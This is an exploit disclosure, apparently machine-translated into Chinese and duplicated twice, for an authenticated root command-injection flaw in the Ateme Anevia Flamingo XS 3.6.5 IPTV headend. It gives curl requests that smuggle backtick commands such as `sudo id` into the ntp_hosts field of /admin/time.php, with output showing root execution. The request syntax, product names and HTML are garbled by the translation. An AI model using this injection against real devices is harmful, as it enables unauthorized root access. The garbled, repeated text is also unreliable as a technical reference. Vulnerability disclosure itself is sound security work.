利用标题: ANEVIA FLAMINGO XS 3.6.5-身份验证的根远程代码执行
利用作者:液态虫
vendor: Ateme
产品网页: https://www.ateme.com
受影响的版本: 3.6.5
硬件修订版: 1.1
肥皂2.4.0
肥皂系统1.3.1
Summary: Flamingo XL,一种新的模块化和高密度IPTV头端
酒店和公司市场的产品。火烈鸟XL捕获
卫星,有线,数字地面的直播电视和广播内容
和模拟源在通过IP网络将其流式传输到STB之前,PC
或其他IP连接的设备。火烈鸟XL基于模块
4U机架硬件平台允许酒店和公司视频
服务提供商可以从各种来源提供多种渠道
超越内部IP网络。
DESC:受影响的设备患有身份验证的远程代码
执行漏洞。远程攻击者可以利用此问题
并执行任意系统命令授予她的系统访问
具有根特权。
在: GNU/Linux 3.14.29(x86_64)测试
Apache/2.2.22(Debian)
php/5.6.0-0anevia2
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5778
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5778.php
13.04.2023
- -
$ curl -sl'http://192.168.1.1/admin/time.php'-h cookie: phpsessid=o4pan20dtnfb239trffu06pid4'-d 'ntp_hosts%5B%5D=ntp_host%5b%5D=%60ID%60NTP_ADDRESS=update=applyRequest=ntp'| Findstr www-data
tduid=33(www-data)/td
输入type='隐藏'名称='ntp_host []'value='uid=33(www-data)'//
TDGID=33(www-data)/TD
输入类型='隐藏'名称='ntp_host []'value='gid=33(www-data)'/
tdGroups=33(www-data),6(磁盘),25(ploppy)/td
输入type='hidend'名称='ntp_hosts []'value='组=33(www-data),6(磁盘),25(floppy)'//
---
$ curl -sl'http://192.168.1.1/admin/time.php'-h cookie: phpsessid=o4pan20dtnfb239trffu06pid4'-d 'ntp_hosts%5b%5D=ntp_host%5b%5D=%60sudo%20ID%60NTP_ADDRESS=update=applionRequest=ntp'| findstr root
tduid=0(root)/td
输入type='隐藏'名称='ntp_host []'value='uid=0(root)'/
tdgid=0(root)/td
输入类型='隐藏'名='ntp_host []'value='gid=0(root)'/
tdGroups=0(root)/td
输入type='隐藏'名称='ntp_hosts []'value='组=0(root)'/
利用作者:液态虫
vendor: Ateme
产品网页: https://www.ateme.com
受影响的版本: 3.6.5
硬件修订版: 1.1
肥皂2.4.0
肥皂系统1.3.1
Summary: Flamingo XL,一种新的模块化和高密度IPTV头端
酒店和公司市场的产品。火烈鸟XL捕获
卫星,有线,数字地面的直播电视和广播内容
和模拟源在通过IP网络将其流式传输到STB之前,PC
或其他IP连接的设备。火烈鸟XL基于模块
4U机架硬件平台允许酒店和公司视频
服务提供商可以从各种来源提供多种渠道
超越内部IP网络。
DESC:受影响的设备患有身份验证的远程代码
执行漏洞。远程攻击者可以利用此问题
并执行任意系统命令授予她的系统访问
具有根特权。
在: GNU/Linux 3.14.29(x86_64)测试
Apache/2.2.22(Debian)
php/5.6.0-0anevia2
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5778
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5778.php
13.04.2023
- -
$ curl -sl'http://192.168.1.1/admin/time.php'-h cookie: phpsessid=o4pan20dtnfb239trffu06pid4'-d 'ntp_hosts%5B%5D=ntp_host%5b%5D=%60ID%60NTP_ADDRESS=update=applyRequest=ntp'| Findstr www-data
tduid=33(www-data)/td
输入type='隐藏'名称='ntp_host []'value='uid=33(www-data)'//
TDGID=33(www-data)/TD
输入类型='隐藏'名称='ntp_host []'value='gid=33(www-data)'/
tdGroups=33(www-data),6(磁盘),25(ploppy)/td
输入type='hidend'名称='ntp_hosts []'value='组=33(www-data),6(磁盘),25(floppy)'//
---
$ curl -sl'http://192.168.1.1/admin/time.php'-h cookie: phpsessid=o4pan20dtnfb239trffu06pid4'-d 'ntp_hosts%5b%5D=ntp_host%5b%5D=%60sudo%20ID%60NTP_ADDRESS=update=applionRequest=ntp'| findstr root
tduid=0(root)/td
输入type='隐藏'名称='ntp_host []'value='uid=0(root)'/
tdgid=0(root)/td
输入类型='隐藏'名='ntp_host []'value='gid=0(root)'/
tdGroups=0(root)/td
输入type='隐藏'名称='ntp_hosts []'value='组=0(root)'/